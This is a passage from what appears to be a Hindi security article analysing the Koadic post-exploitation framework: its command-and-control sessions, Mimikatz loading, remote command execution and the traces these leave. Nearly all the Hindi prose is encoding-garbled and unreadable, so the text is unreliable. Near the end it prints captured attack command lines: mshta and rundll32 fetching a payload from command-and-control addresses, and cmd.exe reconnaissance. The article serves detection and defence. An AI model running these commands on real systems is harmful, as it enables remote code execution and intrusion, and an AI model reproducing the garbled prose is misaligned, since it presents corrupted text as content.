рдХрд┐рдпрд╛ рдЬрд╛рддрд╛ рд╣реИ, рдЬреЛ рдЗрд╕реЗ рдирд┐рдпрдВрддреНрд░рд┐рдд рдХрд░рдиреЗ рдХреА рдЕрдиреБрдорддрд┐ рджреЗрддрд╛ рд╣реИред рдРрд╕реА рдорд╢реАрди, Koadic рд╢рдмреНрджрд╛рд╡рд▓реА рдореЗрдВ, "рдЬрд╝реЛрдВрдмреА" рдХрд╣рд▓рд╛рддреА рд╣реИред рдкреАрдбрд╝рд┐рдд рдкрдХреНрд╖ рдкрд░ рдкреВрд░реНрдг рдХрд╛рд░реНрдп рдХреЗ рд▓рд┐рдП рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░реЛрдВ рдХреА рдХрдореА рдХреЗ рд╕рд╛рде, рдХреЛрдПрдбрд┐рдХ рдореЗрдВ рдпреВрдПрд╕реА рдмрд╛рдИрдкрд╛рд╕ рддрдХрдиреАрдХ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рдЙрдиреНрд╣реЗрдВ рдЙрдард╛рдиреЗ рдХреА рдХреНрд╖рдорддрд╛ рд╣реИред
рдЕрдВрдЬреАрд░ред 10. рдХрдорд╛рдВрдб рд╢реЗрд▓ рдХреЛрдбрд┐рдХрдкреАрдбрд╝рд┐рдд рдХреЛ рдХрдорд╛рдВрдб рдПрдВрдб рдХрдВрдЯреНрд░реЛрд▓ рд╕рд░реНрд╡рд░ рдХреЗ рд╕рд╛рде рд╕рдВрдЪрд╛рд░ рд╢реБрд░реВ рдХрд░рдирд╛ рдЪрд╛рд╣рд┐рдПред рдРрд╕рд╛ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП, рдЙрд╕реЗ рдПрдХ рдкреВрд░реНрд╡-рддреИрдпрд╛рд░ рдпреВрдЖрд░рдЖрдИ рдХреЗ рд▓рд┐рдП рдЖрд╡реЗрджрди рдХрд░рдиреЗ рдХреА рдЖрд╡рд╢реНрдпрдХрддрд╛ рд╣реЛрддреА рд╣реИ рдФрд░ рдореБрдЦреНрдп рд╕реНрдЯреИрдбрд┐рдХ рдмреЙрдбреА рдореЗрдВ рд╕реЗ рдПрдХ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рдкреНрд░рд╛рдкреНрдд рдХрд░рдирд╛ рд╣реЛрддрд╛ рд╣реИред рдЕрдВрдЬреАрд░ рдореЗрдВред резрез рдореЗрдВ рдорд╕реНрддрдХ рдХреЗ рд▓рд┐рдП рдПрдХ рдЙрджрд╛рд╣рд░рдг рджрд┐рдЦрд╛рдпрд╛ рдЧрдпрд╛ рд╣реИред
рдЕрдВрдЬреАрд░ред 11. рдПрдХ CnC рд╕рд░реНрд╡рд░ рдХреЗ рд╕рд╛рде рдПрдХ рд╕рддреНрд░ рд╢реБрд░реВ рдХрд░рдирд╛рдкреНрд░рддрд┐рдХреНрд░рд┐рдпрд╛ рдЪрд░ WS рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рддреЗ рд╣реБрдП, рдпрд╣ рд╕реНрдкрд╖реНрдЯ рд╣реЛ рдЬрд╛рддрд╛ рд╣реИ рдХрд┐ рдирд┐рд╖реНрдкрд╛рджрди WScript.Shell рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рд╣реЛрддрд╛ рд╣реИ, рдФрд░ рдЪрд░ STAGER, SESSIONKEY, JOBKEY, JOBKEYPATH, EXPIRE рд╡рд░реНрддрдорд╛рди рд╕рддреНрд░ рдХреЗ рдорд╛рдкрджрдВрдбреЛрдВ рдХреЗ рдмрд╛рд░реЗ рдореЗрдВ рдорд╣рддреНрд╡рдкреВрд░реНрдг рдЬрд╛рдирдХрд╛рд░реА рд░рдЦрддреЗ рд╣реИрдВред рдпрд╣ CnC рд╕рд░реНрд╡рд░ рдХреЗ рд▓рд┐рдП HTTP рдХрдиреЗрдХреНрд╢рди рдореЗрдВ рдкрд╣рд▓реА рдЕрдиреБрд░реЛрдз-рдкреНрд░рддрд┐рдХреНрд░рд┐рдпрд╛ рдЬреЛрдбрд╝реА рд╣реИред рдмрд╛рдж рдХреЗ рдЕрдиреБрд░реЛрдзреЛрдВ рдХреЛ рд╕реАрдзреЗ рдореЙрдбреНрдпреВрд▓ (рдкреНрд░рддреНрдпрд╛рд░реЛрдкрдг) рдХреА рдХрд╛рд░реНрдпрдХреНрд╖рдорддрд╛ рд╕реЗ рд╕рдВрдмрдВрдзрд┐рдд рдХрд┐рдпрд╛ рдЬрд╛рддрд╛ рд╣реИред рд╕рднреА Koadic рдореЙрдбреНрдпреВрд▓ рдХреЗрд╡рд▓ CnC рдХреЗ рд╕рд╛рде рдПрдХ рд╕рдХреНрд░рд┐рдп рд╕рддреНрд░ рдХреЗ рд╕рд╛рде рдХрд╛рдо рдХрд░рддреЗ рд╣реИрдВред
Mimikatz
рдЬрд┐рд╕ рддрд░рд╣ рд╕реАрдПрдордИ рдмреНрд▓рдбрд╣рд╛рдЙрдВрдб рдХреЗ рд╕рд╛рде рдХрд╛рдо рдХрд░рддрд╛ рд╣реИ, рдХреЛрдЖрдбрд┐рдХ рдорд┐рдорд┐рдХреНрдЬрдЯреИ рдХреЗ рд╕рд╛рде рдПрдХ рд╕реНрдЯреИрдВрдбрдЕрд▓реЛрди рдкреНрд░реЛрдЧреНрд░рд╛рдо рдХреЗ рд░реВрдк рдореЗрдВ рдХрд╛рдо рдХрд░рддрд╛ рд╣реИ рдФрд░ рдЗрд╕реЗ рдЪрд▓рд╛рдиреЗ рдХреЗ рдХрдИ рддрд░реАрдХреЗ рд╣реИрдВред рдиреАрдЪреЗ рдПрдХ Mimikatz рдкреНрд░рддреНрдпрд╛рд░реЛрдкрдг рд▓реЛрдб рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдПрдХ рдЕрдиреБрд░реЛрдз-рдкреНрд░рддрд┐рдХреНрд░рд┐рдпрд╛ рдЬреЛрдбрд╝реА рд╣реИред
рдЕрдВрдЬреАрд░ред 12. Mimikatz рдХрд╛ Koadic рдореЗрдВ рд╕реНрдерд╛рдирд╛рдВрддрд░рдгрдЖрдк рджреЗрдЦ рд╕рдХрддреЗ рд╣реИрдВ рдХрд┐ рдЕрдиреБрд░реЛрдз рдореЗрдВ URI рдкреНрд░рд╛рд░реВрдк рдХреИрд╕реЗ рдмрджрд▓ рдЧрдпрд╛ рд╣реИред рдЗрд╕рдореЗрдВ рд╕реАрдПрд╕рдЖрд░рдПрдл рдЪрд░ рдХрд╛ рдорд╛рди рджрд┐рдЦрд╛рдИ рджрд┐рдпрд╛, рдЬреЛ рдЪрдпрдирд┐рдд рдореЙрдбреНрдпреВрд▓ рдХреЗ рд▓рд┐рдП рдЬрд┐рдореНрдореЗрджрд╛рд░ рд╣реИред рдЙрд╕рдХреЗ рдирд╛рдо рдкрд░ рдзреНрдпрд╛рди рди рджреЗрдВ; рд╣рдо рд╕рднреА рдЬрд╛рдирддреЗ рд╣реИрдВ рдХрд┐ CSRF рдХреЛ рдЖрдорддреМрд░ рдкрд░ рдЕрд▓рдЧ рддрд░рд╣ рд╕реЗ рд╕рдордЭрд╛ рдЬрд╛рддрд╛ рд╣реИред рдЬрд╡рд╛рдм рдореЗрдВ, рдХреЛрдПрдбрд┐рдХ рдХрд╛ рд╡рд╣реА рдореБрдЦреНрдп рд╢рд░реАрд░ рд╕рд╛рдордиреЗ рдЖрдпрд╛, рдЬрд┐рд╕рдореЗрдВ рдорд┐рдорд┐рдХрдЬрд╝реИрдЯ рд╕реЗ рдЬреБрдбрд╝рд╛ рдХреЛрдб рдЬреЛрдбрд╝рд╛ рдЧрдпрд╛ рдерд╛ред рдпрд╣ рдХрд╛рдлреА рдмрдбрд╝рд╛ рд╣реИ, рдЗрд╕рд▓рд┐рдП рдкреНрд░рдореБрдЦ рдмрд┐рдВрджреБрдУрдВ рдкрд░ рд╡рд┐рдЪрд╛рд░ рдХрд░реЗрдВред рдЗрд╕рд╕реЗ рдкрд╣рд▓реЗ рдХрд┐ рд╣рдо рдмреЗрд╕ 64 рдПрдирдХреЛрдбреЗрдб Mimikatz рд▓рд╛рдЗрдмреНрд░реЗрд░реА рд╣реИ, рдХреНрд░рдордмрджреНрдз .NET рд╡рд░реНрдЧ рдЬреЛ рдЗрд╕реЗ рдЗрдВрдЬреЗрдХреНрдЯ рдХрд░реЗрдЧрд╛, рдФрд░ Mimikatz рдЪрд▓рд╛рдиреЗ рдХреЗ рд▓рд┐рдП рддрд░реНрдХ рджреЗрдЧрд╛ред рдирд┐рд╖реНрдкрд╛рджрди рдХрд╛ рдкрд░рд┐рдгрд╛рдо рд╕реНрдкрд╖реНрдЯ рдореЗрдВ рдиреЗрдЯрд╡рд░реНрдХ рдкрд░ рдкреНрд░реЗрд╖рд┐рдд рд╣реЛрддрд╛ рд╣реИред
рдЕрдВрдЬреАрд░ред 13. рд░рд┐рдореЛрдЯ рдорд╢реАрди рдкрд░ Mimikatz рдЪрд▓рд╛рдиреЗ рдХрд╛ рдкрд░рд┐рдгрд╛рдоExec_cmd
Koadic рдореЗрдВ рдРрд╕реЗ рдореЙрдбреНрдпреВрд▓ рднреА рд╣реИрдВ рдЬреЛ рджреВрд░рд╕реНрде рд░реВрдк рд╕реЗ рдХрдорд╛рдВрдб рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд░ рд╕рдХрддреЗ рд╣реИрдВред рдпрд╣рд╛рдБ рд╣рдо URI рдФрд░ рдкрд░рд┐рдЪрд┐рдд рдЪрд░ рдФрд░ рд╕реАрдПрд╕рдЖрд░рдПрдл рдмрдирд╛рдиреЗ рдХреА рдПрдХ рд╣реА рд╡рд┐рдзрд┐ рджреЗрдЦреЗрдВрдЧреЗред Exec_cmd рдореЙрдбреНрдпреВрд▓ рдХреЗ рдорд╛рдорд▓реЗ рдореЗрдВ, рдХреЛрдб рдХреЛ рд╢рд░реАрд░ рдореЗрдВ рдЬреЛрдбрд╝рд╛ рдЬрд╛рддрд╛ рд╣реИ рдЬреЛ рд╢реЗрд▓ рдХрдорд╛рдВрдб рдХреЛ рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд░рдиреЗ рдореЗрдВ рд╕рдХреНрд╖рдо рд╣реИред рдирд┐рдореНрдирд▓рд┐рдЦрд┐рдд рдХреЛрдб CnC рд╕рд░реНрд╡рд░ рдХреА HTTP рдкреНрд░рддрд┐рдХреНрд░рд┐рдпрд╛ рдореЗрдВ рджрд┐рдЦрд╛рдпрд╛ рдЧрдпрд╛ рд╣реИред
рдЕрдВрдЬреАрд░ред 14. рдЗрдореНрдкреНрд▓рд╛рдВрдЯ рдХреЛрдб exec_cmdрдХреЛрдб рдирд┐рд╖реНрдкрд╛рджрди рдХреЗ рд▓рд┐рдП рдкрд░рд┐рдЪрд┐рдд WS рд╡рд┐рд╢реЗрд╖рддрд╛ рд╡рд╛рд▓рд╛ GAWTUUGCFI рдЪрд░ рдЖрд╡рд╢реНрдпрдХ рд╣реИред рдЗрд╕рдХреА рдорджрдж рд╕реЗ, рдЗрдореНрдкреНрд▓рд╛рдВрдЯ рд╢реЗрд▓ рдХреЛ рдХреЙрд▓ рдХрд░рддрд╛ рд╣реИ, рдХреЛрдб рдХреА рджреЛ рд╢рд╛рдЦрд╛рдУрдВ рдХреЛ рд╕рдВрд╕рд╛рдзрд┐рдд рдХрд░рддрд╛ рд╣реИ - shell.exec рдЖрдЙрдЯрдкреБрдЯ рдбреЗрдЯрд╛ рд╕реНрдЯреНрд░реАрдо рдХреА рд╡рд╛рдкрд╕реА рдХреЗ рд╕рд╛рде рдФрд░ рд╢реЗрд▓ред рдмрд┐рдирд╛ рд╡рд╛рдкрд╕ рд▓реМрдЯреЗред
Koadic рдПрдХ рд╡рд┐рд╢рд┐рд╖реНрдЯ рдЙрдкрдХрд░рдг рдирд╣реАрдВ рд╣реИ, рд▓реЗрдХрд┐рди рдЗрд╕рдХреА рдЕрдкрдиреА рдХрд▓рд╛рдХреГрддрд┐рдпрд╛рдБ рд╣реИрдВ рдЬрд┐рдирдХреЗ рджреНрд╡рд╛рд░рд╛ рдЗрд╕реЗ рд╡реИрдз рдпрд╛рддрд╛рдпрд╛рдд рдореЗрдВ рдкрд╛рдпрд╛ рдЬрд╛ рд╕рдХрддрд╛ рд╣реИ:
- HTTP рдЕрдиреБрд░реЛрдзреЛрдВ рдХрд╛ рд╡рд┐рд╢реЗрд╖ рдЧрдарди,
- winHttpRequests API рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рддреЗ рд╣реБрдП,
- ActiveXObject рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ WScript.Shell рдСрдмреНрдЬреЗрдХреНрдЯ рдмрдирд╛рдирд╛,
- рдмрдбрд╝реЗ рдирд┐рд╖реНрдкрд╛рджрди рдпреЛрдЧреНрдп рд╢рд░реАрд░ред
рдкреНрд░рд╛рд░рдВрднрд┐рдХ рдХрдиреЗрдХреНрд╢рди рджрд╛рдВрд╡ рдХреЛ рд╢реБрд░реВ рдХрд░рддрд╛ рд╣реИ, рдЗрд╕рд▓рд┐рдП рд╡рд┐рдВрдбреЛрдЬ рдШрдЯрдирд╛рдУрдВ рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рдЗрд╕рдХреА рдЧрддрд┐рд╡рд┐рдзрд┐ рдХрд╛ рдкрддрд╛ рд▓рдЧрд╛рдирд╛ рд╕рдВрднрд╡ рд╣реЛ рдЬрд╛рддрд╛ рд╣реИред Mshta рдХреЗ рд▓рд┐рдП, рдпрд╣ рдШрдЯрдирд╛ 4688 рд╣реИ, рдЬреЛ рдПрдХ рд▓реЙрдиреНрдЪ рд╡рд┐рд╢реЗрд╖рддрд╛ рдХреЗ рд╕рд╛рде рдПрдХ рдкреНрд░рдХреНрд░рд┐рдпрд╛ рдмрдирд╛рдиреЗ рдХреА рдмрд╛рдд рдХрд░рддреА рд╣реИ:
C:\Windows\system32\mshta.exe http://192.168.211.1:9999/dXpT6
Koadic рдХреЗ рдирд┐рд╖реНрдкрд╛рджрди рдХреЗ рджреМрд░рд╛рди, рдЖрдк рдЕрдиреНрдп 4688 рдШрдЯрдирд╛рдУрдВ рдХреЛ рдЙрди рд╡рд┐рд╢реЗрд╖рддрд╛рдУрдВ рдХреЗ рд╕рд╛рде рджреЗрдЦ рд╕рдХрддреЗ рд╣реИрдВ рдЬреЛ рдЗрд╕реЗ рдкреВрд░реА рддрд░рд╣ рд╕реЗ рдЪрд┐рддреНрд░рд┐рдд рдХрд░рддреА рд╣реИрдВ:
rundll32.exe http://192.168.241.1:9999/dXpT6?sid=1dbef04007a64fba83edb3f3928c9c6c; csrf=;\..\..\..\mshtml,RunHTMLApplication rundll32.exe http://192.168.202.136:9999/dXpT6?sid=12e0bbf6e9e5405690e5ede8ed651100;csrf=18f93a28e0874f0d8d475d154bed1983;\..\..\..\mshtml,RunHTMLApplication "C:\Windows\system32\cmd.exe" /q /c chcp 437 & net session 1> C:\Users\user02\AppData\Local\Temp\6dc91b53-ddef-2357-4457-04a3c333db06.txt 2>&1 "C:\Windows\system32\cmd.exe" /q /c chcp 437 & ipconfig 1> C:\Users\user02\AppData\Local\Temp\721d2d0a-890f-9549-96bd-875a495689b7.txt 2>&1
рдирд┐рд╖реНрдХрд░реНрд╖
рднреВрдорд┐ рдХреА рдкреНрд░рд╡реГрддреНрддрд┐ рд╕реЗ рджреВрд░ рд░рд╣рдиреЗ рд╡рд╛рд▓реЗ рдШреБрд╕рдкреИрдард┐рдпреЛрдВ рдХреЗ рдмреАрдЪ рд▓реЛрдХрдкреНрд░рд┐рдпрддрд╛ рд╣рд╛рд╕рд┐рд▓ рдХрд░ рд░рд╣реЗ рд╣реИрдВред рд╡реЗ рдЕрдкрдиреА рдЖрд╡рд╢реНрдпрдХрддрд╛рдУрдВ рдХреЗ рд▓рд┐рдП рдЕрдВрддрд░реНрдирд┐рд╣рд┐рдд рд╡рд┐рдВрдбреЛрдЬ рдЯреВрд▓ рдФрд░ рддрдВрддреНрд░ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рддреЗ рд╣реИрдВред рд╣рдо рджреЗрдЦрддреЗ рд╣реИрдВ рдХрд┐ рдЗрд╕ рд╕рд┐рджреНрдзрд╛рдВрдд рдХрд╛ рдкрд╛рд▓рди рдХрд░рдиреЗ рд╡рд╛рд▓реЗ рд▓реЛрдХрдкреНрд░рд┐рдп Koadic, CrackMapExec рдФрд░ Impacket рдЯреВрд▓ APT рд░рд┐рдкреЛрд░реНрдЯреНрд╕ рдореЗрдВ рдХреИрд╕реЗ рддреЗрдЬреА рд╕реЗ рдкрд╛рдП рдЬрд╛рддреЗ рд╣реИрдВред рдЗрди рдЙрдкрдХрд░рдгреЛрдВ рдХреЗ рд▓рд┐рдП рдЧрд┐рдЯрд╣рдм рдкрд░ рдХрд╛рдВрдЯреЗ рдХреА рд╕рдВрдЦреНрдпрд╛ рднреА рдмрдврд╝ рд░рд╣реА рд╣реИ, рдирдП рджрд┐рдЦрд╛рдИ рджреЗрддреЗ рд╣реИрдВ (рдЕрдм рдЙрдирдореЗрдВ рд╕реЗ рд▓рдЧрднрдЧ рдПрдХ рд╣рдЬрд╛рд░ рд╣реИрдВ)ред рдкреНрд░рд╡реГрддреНрддрд┐ рдЕрдкрдиреА рд╕рд╛рджрдЧреА рдХреЗ рдХрд╛рд░рдг рд▓реЛрдХрдкреНрд░рд┐рдпрддрд╛ рд╣рд╛рд╕рд┐рд▓ рдХрд░ рд░рд╣реА рд╣реИ: рд╣рдорд▓рд╛рд╡рд░реЛрдВ рдХреЛ рддреАрд╕рд░реЗ рдкрдХреНрд╖ рдХреЗ рдЙрдкрдХрд░рдг рдХреА рдЖрд╡рд╢реНрдпрдХрддрд╛ рдирд╣реАрдВ рд╣реИ, рд╡реЗ рдкрд╣рд▓реЗ рд╕реЗ рд╣реА рдкреАрдбрд╝рд┐рддреЛрдВ рдХреА рдорд╢реАрдиреЛрдВ рдкрд░ рд╣реИрдВ рдФрд░ рд╕реБрд░рдХреНрд╖рд╛ рдЙрдкрдХрд░рдгреЛрдВ рдХреЛ рдмрд╛рдпрдкрд╛рд╕ рдХрд░рдиреЗ рдореЗрдВ рдорджрдж рдХрд░рддреЗ рд╣реИрдВред рд╣рдо рдиреЗрдЯрд╡рд░реНрдХ рдХрдиреЗрдХреНрдЯрд┐рд╡рд┐рдЯреА рдХрд╛ рдЕрдзреНрдпрдпрди рдХрд░рдиреЗ рдкрд░ рдзреНрдпрд╛рди рдХреЗрдВрджреНрд░рд┐рдд рдХрд░рддреЗ рд╣реИрдВ: рдКрдкрд░ рд╡рд░реНрдгрд┐рдд рдкреНрд░рддреНрдпреЗрдХ рдЙрдкрдХрд░рдг рдиреЗрдЯрд╡рд░реНрдХ рдЯреНрд░реИрдлрд╝рд┐рдХ рдкрд░ рдЕрдкрдиреА рдЫрд╛рдк рдЫреЛрдбрд╝рддрд╛ рд╣реИ; рдЙрдирдореЗрдВ рд╕реЗ рдПрдХ рд╡рд┐рд╕реНрддреГрдд рдЕрдзреНрдпрдпрди рдиреЗ рд╣рдореЗрдВ рдЙрдирдХрд╛ рдкрддрд╛ рд▓рдЧрд╛рдиреЗ рдХреЗ рд▓рд┐рдП рд╣рдорд╛рд░реЗ рдЙрддреНрдкрд╛рдж
рдкреАрдЯреА рдиреЗрдЯрд╡рд░реНрдХ рдЕрдЯреИрдХ рдбрд┐рд╕реНрдХрд╡рд░реА рдХреЛ рд╕рд┐рдЦрд╛рдиреЗ рдХреА рдЕрдиреБрдорддрд┐ рджреА, рдЬреЛ рдЕрдВрддрддрдГ рд╕рд╛рдЗрдмрд░ рдШрдЯрдирд╛рдУрдВ рдХреА рдкреВрд░реА рд╢реНрд░реГрдВрдЦрд▓рд╛ рдХреА рдЬрд╛рдВрдЪ рдХрд░рдиреЗ рдореЗрдВ рдорджрдж рдХрд░рддрд╛ рд╣реИред
рд▓реЗрдЦрдХ :
- рдПрдВрдЯреЛрди рдЯрд╛рдпрд░рд┐рди, рд╡рд┐рд╢реЗрд╖рдЬреНрдЮ рд╕реЗрд╡рд╛рдУрдВ рдХреЗ рдкреНрд░рдореБрдЦ, рдкреАрдЯреА рд╡рд┐рд╢реЗрд╖рдЬреНрдЮ рд╕реБрд░рдХреНрд╖рд╛ рдХреЗрдВрджреНрд░, рд╕рдХрд╛рд░рд╛рддреНрдордХ рдкреНрд░реМрджреНрдпреЛрдЧрд┐рдХреА
- Egor Podmokov, рд╡рд┐рд╢реЗрд╖рдЬреНрдЮ, рдкреАрдЯреА рд╡рд┐рд╢реЗрд╖рдЬреНрдЮ рд╕реБрд░рдХреНрд╖рд╛ рдХреЗрдВрджреНрд░, рд╕рдХрд╛рд░рд╛рддреНрдордХ рдкреНрд░реМрджреНрдпреЛрдЧрд┐рдХреА